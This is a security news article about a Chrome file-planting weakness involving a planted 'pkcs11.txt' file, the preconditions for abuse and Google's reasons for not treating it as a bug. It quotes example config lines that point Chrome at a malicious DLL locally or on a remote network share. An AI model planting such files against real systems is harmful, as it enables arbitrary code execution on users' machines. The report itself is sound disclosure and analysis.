Google Chrome Exposed to 'pkcs11.txt' File Planting

A group of security researchers discovered a bug in Google Chrome that could allow a malicious data file to be loaded in certain conditions, leading to the execution of arbitrary code.

According to Acros experts, with a little social engineering, their proof-of-concept can easily be deployed by a criminal mastermind to take over a system.

A hypothetical attack begins when Chrome loads a data file called pkcs11.txt. If the library variable from the text file is assigned a value such as library=c:\\temp\malicious.dll, the malicious.dll file can be executed.

This also works on remote shared folders as the value can be easily replaced with something like library=\\www.binaryplanting.com\demo\chrome_pkcs11Planting\malicious.lib.

Since the Chrome sandbox wouldn't stop the procedure as it's executed by the parent process, chrome.exe, this could represent a real issue.

So why didn't Google reply to this matter with a fix, especially since they were alerted of the problem a month ago?

The answer is simple: because there are too many conditions for such an attack to function and too much social engineering is required to obtain the optimal parameters.

First of all, Google must not be set as the default search engine within the browser. This is a condition since other search engines don't send any HTTPS requests when Chrome is launched.

The strike also relies on the fact that HTTPS requests are not sent prior to the process, so if any websites that implement the secure protocol are visited, the whole operation fails.

Since the file's name is actually “/pkcs11.txt” it means that it will be loaded from the current working directory or from the root. This implies that the hacker will have to gain control of the working directory to successfully launch a hit.

“If the attacker could get the user to try to load a file from her network shared folder, and trigger the first HTTPS request while the user had this folder opened in the 'Open' dialog, Chrome would load pkcs11.txt from the root of attacker's network share and load the library specified in it,” reveal the researchers.

Because of the many conditions needed to launch such an attack, Google considered that the matter is not actually a bug.

“Strange behavior, but we're not treating this as a security bug. The preconditions to exploit this are too stretched: non-default browser configuration, freshly started browser, ability to get someone to load a file from your share.”

They consider that “the social engineering level involved here is significantly higher than 'Your computer is infected with a virus, download this free anti-virus software and run the exe file to fix it.'”

Despite of what Google thinks, the Acros Security Research Lab team believes that any feature that could allow for remote code execution on a device should be considered a vulnerability.